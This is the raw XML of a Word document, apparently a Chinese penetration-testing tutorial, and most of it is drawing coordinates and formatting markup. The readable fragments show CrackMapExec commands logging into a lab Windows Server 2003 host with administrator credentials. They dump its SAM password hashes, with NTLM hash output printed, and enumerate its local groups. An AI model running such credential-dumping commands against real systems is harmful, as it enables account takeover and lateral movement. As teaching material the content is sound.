26,12705,1925,12705,1924,12705,1922,12705,1921,12705,1919,12705,1918,12705,1916,12705,1915,12705,1913,12705,1911,12705,1910,12705,1908,12705,1906,12705,1905,12705,1903,12705,1901,12705,1899,12705,1897,12705,1895,12705,1893,12705,1891,12705,1889,12705,1887,12705,1884,12705,1882,12705,1880,12705,1878,12705,1875,12705,1873,12705,1870,12705,1868,12705,1865,12705,1863,12705,1860,12705,1857,12705,1854,12705,1852,12705,1849,12705,1846,12705,1843,12705,1840,12705,1840,12705,1840,12705,1840,12705,1840,12705,1840,12705,1840,12705,1840,12705,1840,12705,1840,12705,1840,12705,1840,12705,1840,12705,1840,12705,1840,12705,1840,12705,1840,12705,1840,12705,1840,12705,1840,12705,1840,12704,1840,12704,1840,12704,1840,12704,1840,12704,1840,12703,1840,12703,1840,12703,1840,12702,1840,12702,1840,12702,1840,12701,1840,12701,1840,12700,1840,12700,1840,12699,1840,12699,1840,12698,1840,12698,1840,12697,1840,12696,1840,12696,1840,12695,1840,12694,1840,12693,1840,12693,1840,12692,1840,12691,1840,12690,1840,12689,1840,12688,1840,12686,1840,12685,1840,12684,1840,12683,1840,12682,1840,12680,1840,12679,1840,12677,1840,12676,1840,12674,1840,12673,1840,12671,1840,12669,1840,12668,1840,12666,1840,12664,1840,12662,1840,12660,1840,12658,1840,12656,1840,12653,1840,12651,1840,12649,1840,12647,1840,12644,1840,12642,1840,12639,1840,12636,1840,12634,1840,12631,1840,12628,1840,12625,1840,12622,1840,12619,1840,12616,1840,12612,1840,12609,1840,12606,1840,12602,1840,12599,1840,12595,1840,12591,1840,12588,1840,12584,1840,12580,1840,12576,1840,12571,1840,12567,1840,12563,1840,12559,1840,12554,1840,12549,1840,12545,1840,12540,1840,12535,1840,12530,1840,12525,1840,12520,1840,12515,1840,12509,1840,12504,1840,12498,1840,12493,1840,12487,1840,12481,1840,12475,1840,12469,1840,12463,1840,12457,1840,12450e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:289.500pt;margin-top:639.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="5790,12790" coordsize="130,270">
        <v:shape style="position:absolute;left:5790;top:12790;width:130;height:270" coordorigin="5790,12790" coordsize="130,270" path="m5817,12810l5817,12810,5817,12810,5817,12810,5817,12810,5817,12810,5817,12810,5817,12810,5817,12810,5817,12810,5817,12810,5817,12810,5817,12810,5817,12810,5817,12810,5817,12810,5817,12810,5817,12810,5817,12810,5817,12810,5817,12810,5817,12810,5818,12810,5818,12810,5818,12810,5818,12810,5818,12810,5818,12810,5818,12810,5818,12810,5819,12810,5819,12810,5819,12810,5819,12810,5819,12810,5820,12810,5820,12810,5820,12810,5821,12810,5821,12810,5821,12810,5821,12810,5822,12810,5822,12810,5823,12810,5823,12810,5823,12810,5824,12810,5824,12810,5825,12810,5825,12810,5826,12810,5826,12810,5827,12810,5828,12810,5828,12810,5829,12810,5829,12810,5830,12810,5831,12810,5832,12810,5832,12810,5833,12810,5834,12810,5835,12810,5836,12810,5836,12810,5837,12810,5838,12810,5839,12810,5840,12810,5841,12810,5842,12810,5844,12810,5845,12810,5846,12810,5847,12810,5848,12810,5849,12810,5851,12810,5852,12810,5853,12810,5855,12810,5856,12810,5858,12810,5859,12810,5861,12810,5862,12810,5864,12810,5865,12810,5867,12810,5869,12810,5871,12810,5872,12810,5874,12810,5876,12810,5878,12810,5880,12810,5882,12810,5884,12810,5886,12810,5888,12810,5890,12810,5893,12810,5895,12810,5897,12810,5899,12810,5902,12810,5904,12810,5907,12810,5909,12810,5912,12810,5914,12810,5917,12810,5920,12810,5922,12810,5925,12810,5928,12810,5931,12810,5934,12810,5937,12810,5937,12810,5937,12810,5937,12810,5937,12810,5937,12810,5937,12810,5937,12810,5937,12811,5937,12811,5937,12811,5937,12811,5937,12811,5937,12811,5937,12811,5937,12811,5937,12811,5937,12811,5937,12811,5937,12811,5937,12811,5937,12812,5937,12812,5937,12812,5937,12812,5937,12813,5937,12813,5937,12813,5937,12813,5937,12814,5937,12814,5937,12815,5937,12815,5937,12815,5937,12816,5937,12816,5937,12817,5937,12818,5937,12818,5937,12819,5937,12819,5937,12820,5937,12821,5937,12822,5937,12822,5937,12823,5937,12824,5937,12825,5937,12826,5937,12827,5937,12828,5937,12829,5937,12831,5937,12832,5937,12833,5937,12834,5937,12836,5937,12837,5937,12838,5937,12840,5937,12842,5937,12843,5937,12845,5937,12847,5937,12848,5937,12850,5937,12852,5937,12854,5937,12856,5937,12858,5937,12860,5937,12862,5937,12865,5937,12867,5937,12869,5937,12872,5937,12874,5937,12877,5937,12880,5937,12882,5937,12885,5937,12888,5937,12891,5937,12894,5937,12897,5937,12900,5937,12903,5937,12907,5937,12910,5937,12914,5937,12917,5937,12921,5937,12925,5937,12928,5937,12932,5937,12936,5937,12940,5937,12944,5937,12949,5937,12953,5937,12957,5937,12962,5937,12966,5937,12971,5937,12976,5937,12981,5937,12986,5937,12991,5937,12996,5937,13001,5937,13007,5937,13012,5937,13018,5937,13023,5937,13029,5937,13035,5937,13041,5937,13047,5937,13053,5937,13059,5937,13066,5937,13066,5937,13066,5937,13066,5937,13066,5937,13066,5937,13066,5937,13066,5937,13066,5937,13066,5937,13066,5937,13066,5937,13066,5937,13066,5937,13066,5937,13066,5937,13066,5937,13066,5937,13066,5937,13066,5937,13066,5936,13066,5936,13066,5936,13066,5936,13066,5936,13066,5936,13066,5936,13066,5936,13066,5935,13066,5935,13066,5935,13066,5935,13066,5935,13066,5934,13066,5934,13066,5934,13066,5934,13066,5933,13066,5933,13066,5933,13066,5932,13066,5932,13066,5932,13066,5931,13066,5931,13066,5930,13066,5930,13066,5930,13066,5929,13066,5929,13066,5928,13066,5928,13066,5927,13066,5926,13066,5926,13066,5925,13066,5924,13066,5924,13066,5923,13066,5922,13066,5922,13066,5921,13066,5920,13066,5919,13066,5918,13066,5917,13066,5917,13066,5916,13066,5915,13066,5914,13066,5913,13066,5911,13066,5910,13066,5909,13066,5908,13066,5907,13066,5906,13066,5904,13066,5903,13066,5902,13066,5901,13066,5899,13066,5898,13066,5896,13066,5895,13066,5893,13066,5892,13066,5890,13066,5888,13066,5887,13066,5885,13066,5883,13066,5882,13066,5880,13066,5878,13066,5876,13066,5874,13066,5872,13066,5870,13066,5868,13066,5866,13066,5864,13066,5861,13066,5859,13066,5857,13066,5855,13066,5852,13066,5850,13066,5847,13066,5845,13066,5842,13066,5840,13066,5837,13066,5834,13066,5831,13066,5829,13066,5826,13066,5823,13066,5820,13066,5817,13066,5817,13066,5817,13066,5817,13066,5817,13066,5817,13066,5817,13066,5817,13066,5817,13066,5817,13066,5817,13065,5817,13065,5817,13065,5817,13065,5817,13065,5817,13065,5817,13065,5817,13065,5817,13065,5817,13065,5817,13065,5817,13064,5817,13064,5817,13064,5817,13064,5817,13063,5817,13063,5817,13063,5817,13063,5817,13062,5817,13062,5817,13061,5817,13061,5817,13061,5817,13060,5817,13060,5817,13059,5817,13059,5817,13058,5817,13057,5817,13057,5817,13056,5817,13055,5817,13054,5817,13054,5817,13053,5817,13052,5817,13051,5817,13050,5817,13049,5817,13048,5817,13047,5817,13045,5817,13044,5817,13043,5817,13042,5817,13040,5817,13039,5817,13038,5817,13036,5817,13034,5817,13033,5817,13031,5817,13030,5817,13028,5817,13026,5817,13024,5817,13022,5817,13020,5817,13018,5817,13016,5817,13014,5817,13011,5817,13009,5817,13007,5817,13004,5817,13002,5817,12999,5817,12996,5817,12994,5817,12991,5817,12988,5817,12985,5817,12982,5817,12979,5817,12976,5817,12973,5817,12969,5817,12966,5817,12962,5817,12959,5817,12955,5817,12951,5817,12948,5817,12944,5817,12940,5817,12936,5817,12932,5817,12927,5817,12923,5817,12919,5817,12914,5817,12910,5817,12905,5817,12900,5817,12895,5817,12890,5817,12885,5817,12880,5817,12875,5817,12870,5817,12864,5817,12859,5817,12853,5817,12847,5817,12841,5817,12835,5817,12829,5817,12823,5817,12817,5817,12810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1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root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="ec9800"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>@John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~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cme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192.168.1.119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11"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐u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administrator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10"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐p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'123456'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‐‐sam</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="136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.119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WIN03X64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Windows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Server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2003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R2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3790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Service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Pack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x32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name:WIN03X64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domain:WIN03X64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signing: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False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SMBv1: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True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)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.119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WIN03X64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+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WIN03X64\administrator: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123456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Pwn3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2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)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4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.119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WIN03X64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+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Dumping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SAM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hashes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="121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.119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WIN03X64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Administrator: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500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44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efce164ab921caaad3b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435b51404ee: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32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ed87bdb5fdc5e9cb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a88547376818d4:::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8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.119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WIN03X64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Guest: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501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:aad3b435b51404eeaad3b435b5140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4ee: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67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f33d2095bda39fb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f6b63fbadf2313a:::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7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.119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WIN03X64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SUPPORT_388945a0:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1001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:aad3b435b51404eea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ad3b435b51404ee:f4d13c67c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7608094c9b0e39147f07520:::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.119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WIN03X64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IUSR_WIN03X64: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1003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:dbec20afefb6cc332311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fb9822ba61ce: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68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c22a11c400d91fa4f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66ff36b3c15dc:::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.119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WIN03X64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IWAM_WIN03X64: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1004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:ff783381e4e022de176c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59bf598409c7:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>7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e456daac229ddcecc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f5f367aa69a487:::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10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体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.119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WIN03X64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ASPNET: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1008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:cc26551b70faffc095feb73db16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b65ff:fec6e9e4a0831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9a1f62cd30447247f88:::</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="14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11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18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z w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.119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WIN03X64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z w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898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Added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6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SAM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hashes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="35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database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5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枚举组</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="378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root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="ec9800"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>@John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~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cme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192.168.1.119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9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐u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administrator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9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐p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'123456'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‐‐loca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l‐gr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="6e7f8f"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>oups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.119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WIN03X64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Windows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Server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2003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R2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3790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Service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Pack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x32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name:WIN03X64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domain:WIN03X64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signing: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False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SMBv1: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True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)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.119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WIN03X64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+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WIN03X64\administrator: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123456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Pwn3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2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="14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4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9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.119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WIN03X64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+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Enumerated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local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groups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.119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WIN03X64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HelpServicesGroup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membercount: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17"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1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.119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WIN03X64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IIS_WPG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membercount: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7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.119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WIN03X64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TelnetClients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membercount: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10"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0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.119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WIN03X64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Administrators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membercount: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9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1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.119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WIN03X64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Backup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Operators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membercount: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10"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0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10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.119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WIN03X64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Distributed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COM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Users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membercount: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14"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0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.119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WIN03X64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Guests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membercount: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0.0pt;width:0.0pt;height:224.838pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,4496">
        <v:shape style="position:absolute;left:10402;top:0;width:0;height:4496" coordorigin="10402,0" coordsize="0,4496" path="m10402,0l10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,1,10402,1,10402,2,10402,3,10402,4,10402,5,10402,7,10402,9,10402,10,10402,13,10402,15,10402,18,10402,21,10402,24,10402,28,10402,32,10402,36,10402,41,10402,46,10402,52,10402,58,10402,65,10402,72,10402,79,10402,87,10402,95,10402,104,10402,114,10402,124,10402,135,10402,146,10402,158,10402,170,10402,183,10402,197,10402,212,10402,227,10402,243,10402,259,10402,277,10402,295,10402,313,10402,333,10402,353,10402,375,10402,397,10402,420,10402,443,10402,468,10402,494,10402,520,10402,548,10402,576,10402,605,10402,635,10402,667,10402,699,10402,732,10402,767,10402,802,10402,839,10402,876,10402,915,10402,955,10402,995,10402,1038,10402,1081,10402,1125,10402,1171,10402,1218,10402,1266,10402,1315,10402,1366,10402,1418,10402,1471,10402,1525,10402,1581,10402,1638,10402,1697,10402,1757,10402,1818,10402,1881,10402,1945,10402,2010,10402,2077,10402,2146,10402,2216,10402,2287,10402,2360,10402,2435,10402,2511,10402,2589,10402,2668,10402,2749,10402,2831,10402,2915,10402,3001,10402,3089,10402,3178,10402,3268,10402,3361,10402,3455,10402,3551,10402,3649,10402,3748,10402,3850,10402,3953,10402,4058,10402,4165,10402,4273,10402,4384,10402,4496e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:49.500pt;width:449.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,990" coordsize="8990,650">
        <v:shape style="position:absolute;left:1490;top:990;width:8990;height:650" coordorigin="1490,990" coordsize="8990,650" path="m1510,1000l1510,1000,1510,1000,1510,1000,1510,1000,1510,1000,1510,1000,1511,1000,1512,1000,1512,1000,1514,1000,1515,1000,1517,1000,1519,1000,1521,1000,1524,1000,1528,1000,1532,1000,1536,1000,1541,1000,1546,1000,1552,1000,1559,1000,1566,1000,1575,1000,1583,1000,1593,1000,1603,1000,1615,1000,1627,1000,1640,1000,1654,1000,1668,1000,1684,1000,1701,1000,1719,1000,1738,1000,1758,1000,1780,1000,1802,1000,1826,1000,1851,1000,1877,1000,1904,1000,1933,1000,1963,1000,1995,1000,2028,1000,2063,1000,2099,1000,2136,1000,2175,1000,2216,1000,2259,1000,2303,1000,2348,1000,2396,1000,2445,1000,2496,1000,2549,1000,2604,1000,2660,1000,2719,1000,2779,1000,2841,1000,2906,1000,2972,1000,3041,1000,3112,1000,3184,1000,3259,1000,3336,1000,3416,1000,3498,1000,3582,1000,3668,1000,3757,1000,3848,1000,3941,1000,4037,1000,4136,1000,4236,1000,4340,1000,4446,1000,4555,1000,4666,1000,4780,1000,4897,1000,5017,1000,5139,1000,5264,1000,5392,1000,5523,1000,5657,1000,5793,1000,5933,1000,6076,1000,6222,1000,6370,1000,6522,1000,6677,1000,6835,1000,6997,1000,7161,1000,7329,1000,7500,1000,7675,1000,7853,1000,8034,1000,8219,1000,8407,1000,8598,1000,8793,1000,8992,1000,9194,1000,9400,1000,9609,1000,9823,1000,10039,1000,10260,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1001,10484,1001,10484,1001,10484,1001,10484,1002,10484,1002,10484,1003,10484,1003,10484,1004,10484,1004,10484,1005,10484,1005,10484,1006,10484,1007,10484,1008,10484,1009,10484,1010,10484,1011,10484,1012,10484,1013,10484,1015,10484,1016,10484,1017,10484,1019,10484,1021,10484,1022,10484,1024,10484,1026,10484,1028,10484,1030,10484,1032,10484,1034,10484,1037,10484,1039,10484,1042,10484,1045,10484,1047,10484,1050,10484,1053,10484,1057,10484,1060,10484,1063,10484,1067,10484,1070,10484,1074,10484,1078,10484,1082,10484,1086,10484,1091,10484,1095,10484,1100,10484,1105,10484,1110,10484,1115,10484,1120,10484,1125,10484,1131,10484,1137,10484,1142,10484,1148,10484,1155,10484,1161,10484,1168,10484,1174,10484,1181,10484,1188,10484,1196,10484,1203,10484,1211,10484,1218,10484,1226,10484,1235,10484,1243,10484,1252,10484,1260,10484,1269,10484,1279,10484,1288,10484,1298,10484,1308,10484,1318,10484,1328,10484,1338,10484,1349,10484,1360,10484,1371,10484,1382,10484,1394,10484,1406,10484,1418,10484,1430,10484,1443,10484,1456,10484,1469,10484,1482,10484,1495,10484,1509,10484,1523,10484,1538,10484,1552,10484,1567,10484,1582,10484,1597,10484,1613,10484,1629,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10483,1645,10482,1645,10482,1645,10480,1645,10479,1645,10477,1645,10475,1645,10473,1645,10470,1645,10466,1645,10462,1645,10458,1645,10453,1645,10448,1645,10442,1645,10435,1645,10428,1645,10419,1645,10411,1645,10401,1645,10391,1645,10379,1645,10367,1645,10354,1645,10340,1645,10326,1645,10310,1645,10293,1645,10275,1645,10256,1645,10236,1645,10215,1645,10192,1645,10168,1645,10143,1645,10117,1645,10090,1645,10061,1645,10031,1645,9999,1645,9966,1645,9931,1645,9895,1645,9858,1645,9819,1645,9778,1645,9735,1645,9691,1645,9646,1645,9598,1645,9549,1645,9498,1645,9445,1645,9391,1645,9334,1645,9275,1645,9215,1645,9153,1645,9088,1645,9022,1645,8953,1645,8883,1645,8810,1645,8735,1645,8658,1645,8578,1645,8497,1645,8413,1645,8326,1645,8238,1645,8146,1645,8053,1645,7957,1645,7859,1645,7758,1645,7654,1645,7548,1645,7439,1645,7328,1645,7214,1645,7097,1645,6977,1645,6855,1645,6730,1645,6602,1645,6471,1645,6337,1645,6201,1645,6061,1645,5918,1645,5773,1645,5624,1645,5472,1645,5317,1645,5159,1645,4997,1645,4833,1645,4665,1645,4494,1645,4319,1645,4141,1645,3960,1645,3776,1645,3587,1645,3396,1645,3201,1645,3002,1645,2800,1645,2594,1645,2385,1645,2172,1645,1955,1645,1734,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1644,1510,1644,1510,1644,1510,1644,1510,1644,1510,1644,1510,1643,1510,1643,1510,1643,1510,1642,1510,1642,1510,1641,1510,1641,1510,1640,1510,1640,1510,1639,1510,1638,1510,1637,1510,1636,1510,1635,1510,1634,1510,1633,1510,1632,1510,1631,1510,1630,1510,1628,1510,1627,1510,1625,1510,1624,1510,1622,1510,1620,1510,1618,1510,1616,1510,1614,1510,1612,1510,1610,1510,1608,1510,1605,1510,1602,1510,1600,1510,1597,1510,1594,1510,1591,1510,1588,1510,1585,1510,1581,1510,1578,1510,1574,1510,1570,1510,1566,1510,1562,1510,1558,1510,1554,1510,1549,1510,1544,1510,1540,1510,1535,1510,1530,1510,1524,1510,1519,1510,1513,1510,1508,1510,1502,1510,1496,1510,1490,1510,1483,1510,1477,1510,1470,1510,1463,1510,1456,1510,1449,1510,1441,1510,1434,1510,1426,1510,1418,1510,1410,1510,1401,1510,1393,1510,1384,1510,1375,1510,1366,1510,1356,1510,1347,1510,1337,1510,1327,1510,1316,1510,1306,1510,1295,1510,1284,1510,1273,1510,1262,1510,1250,1510,1238,1510,1226,1510,1214,1510,1202,1510,1189,1510,1176,1510,1162,1510,1149,1510,1135,1510,1121,1510,1107,1510,1092,1510,1077,1510,1062,1510,1047,1510,1031,1510,1016,1510,1000e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:49.500pt;width:1.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,990" coordsize="30,650">
        <v:shape style="position:absolute;left:1490;top:990;width:30;height:650" coordorigin="1490,990" coordsize="30,650" path="m1517,1000l1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1001,1517,1001,1517,1001,1517,1001,1517,1002,1517,1002,1517,1003,1517,1003,1517,1004,1517,1004,1517,1005,1517,1005,1517,1006,1517,1007,1517,1008,1517,1009,1517,1010,1517,1011,1517,1012,1517,1013,1517,1015,1517,1016,1517,1017,1517,1019,1517,1021,1517,1022,1517,1024,1517,1026,1517,1028,1517,1030,1517,1032,1517,1034,1517,1037,1517,1039,1517,1042,1517,1045,1517,1047,1517,1050,1517,1053,1517,1057,1517,1060,1517,1063,1517,1067,1517,1070,1517,1074,1517,1078,1517,1082,1517,1086,1517,1091,1517,1095,1517,1100,1517,1105,1517,1110,1517,1115,1517,1120,1517,1125,1517,1131,1517,1137,1517,1142,1517,1148,1517,1155,1517,1161,1517,1168,1517,1174,1517,1181,1517,1188,1517,1196,1517,1203,1517,1211,1517,1218,1517,1226,1517,1235,1517,1243,1517,1252,1517,1260,1517,1269,1517,1279,1517,1288,1517,1298,1517,1308,1517,1318,1517,1328,1517,1338,1517,1349,1517,1360,1517,1371,1517,1382,1517,1394,1517,1406,1517,1418,1517,1430,1517,1443,1517,1456,1517,1469,1517,1482,1517,1495,1517,1509,1517,1523,1517,1538,1517,1552,1517,1567,1517,1582,1517,1597,1517,1613,1517,1629,1517,1645e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:81.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1630" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:1630;width:8990;height:370" coordorigin="1490,1630" coordsize="8990,370" path="m1510,1645l1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1511,1645,1512,1645,1512,1645,1514,1645,1515,1645,1517,1645,1519,1645,1521,1645,1524,1645,1528,1645,1532,1645,1536,1645,1541,1645,1546,1645,1552,1645,1559,1645,1566,1645,1575,1645,1583,1645,1593,1645,1603,1645,1615,1645,1627,1645,1640,1645,1654,1645,1668,1645,1684,1645,1701,1645,1719,1645,1738,1645,1758,1645,1780,1645,1802,1645,1826,1645,1851,1645,1877,1645,1904,1645,1933,1645,1963,1645,1995,1645,2028,1645,2063,1645,2099,1645,2136,1645,2175,1645,2216,1645,2259,1645,2303,1645,2348,1645,2396,1645,2445,1645,2496,1645,2549,1645,2604,1645,2660,1645,2719,1645,2779,1645,2841,1645,2906,1645,2972,1645,3041,1645,3112,1645,3184,1645,3259,1645,3336,1645,3416,1645,3498,1645,3582,1645,3668,1645,3757,1645,3848,1645,3941,1645,4037,1645,4136,1645,4236,1645,4340,1645,4446,1645,4555,1645,4666,1645,4780,1645,4897,1645,5017,1645,5139,1645,5264,1645,5392,1645,5523,1645,5657,1645,5793,1645,5933,1645,6076,1645,6222,1645,6370,1645,6522,1645,6677,1645,6835,1645,6997,1645,7161,1645,7329,1645,7500,1645,7675,1645,7853,1645,8034,1645,8219,1645,8407,1645,8598,1645,8793,1645,8992,1645,9194,1645,9400,1645,9609,1645,9823,1645,10039,1645,10260,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1646,10484,1646,10484,1646,10484,1646,10484,1646,10484,1647,10484,1647,10484,1647,10484,1647,10484,1648,10484,1648,10484,1649,10484,1649,10484,1650,10484,1650,10484,1651,10484,1651,10484,1652,10484,1653,10484,1653,10484,1654,10484,1655,10484,1656,10484,1657,10484,1658,10484,1659,10484,1660,10484,1661,10484,1662,10484,1663,10484,1664,10484,1666,10484,1667,10484,1668,10484,1670,10484,1672,10484,1673,10484,1675,10484,1677,10484,1678,10484,1680,10484,1682,10484,1684,10484,1687,10484,1689,10484,1691,10484,1693,10484,1696,10484,1698,10484,1701,10484,1704,10484,1706,10484,1709,10484,1712,10484,1715,10484,1718,10484,1721,10484,1725,10484,1728,10484,1731,10484,1735,10484,1739,10484,1742,10484,1746,10484,1750,10484,1754,10484,1758,10484,1763,10484,1767,10484,1772,10484,1776,10484,1781,10484,1786,10484,1790,10484,1796,10484,1801,10484,1806,10484,1811,10484,1817,10484,1822,10484,1828,10484,1834,10484,1840,10484,1846,10484,1852,10484,1859,10484,1865,10484,1872,10484,1878,10484,1885,10484,1892,10484,1899,10484,1907,10484,1914,10484,1922,10484,1929,10484,1937,10484,1945,10484,1953,10484,1961,10484,1970,10484,1978,10484,1987,10484,1996,10484,2005,10484,2005,10484,2005,10484,2005,10484,2005,10484,2005,10484,2005,10483,2005,10482,2005,10482,2005,10480,2005,10479,2005,10477,2005,10475,2005,10473,2005,10470,2005,10466,2005,10462,2005,10458,2005,10453,2005,10448,2005,10442,2005,10435,2005,10428,2005,10419,2005,10411,2005,10401,2005,10391,2005,10379,2005,10367,2005,10354,2005,10340,2005,10326,2005,10310,2005,10293,2005,10275,2005,10256,2005,10236,2005,10215,2005,10192,2005,10168,2005,10143,2005,10117,2005,10090,2005,10061,2005,10031,2005,9999,2005,9966,2005,9931,2005,9895,2005,9858,2005,9819,2005,9778,2005,9735,2005,9691,2005,9646,2005,9598,2005,9549,2005,9498,2005,9445,2005,9391,2005,9334,2005,9275,2005,9215,2005,9153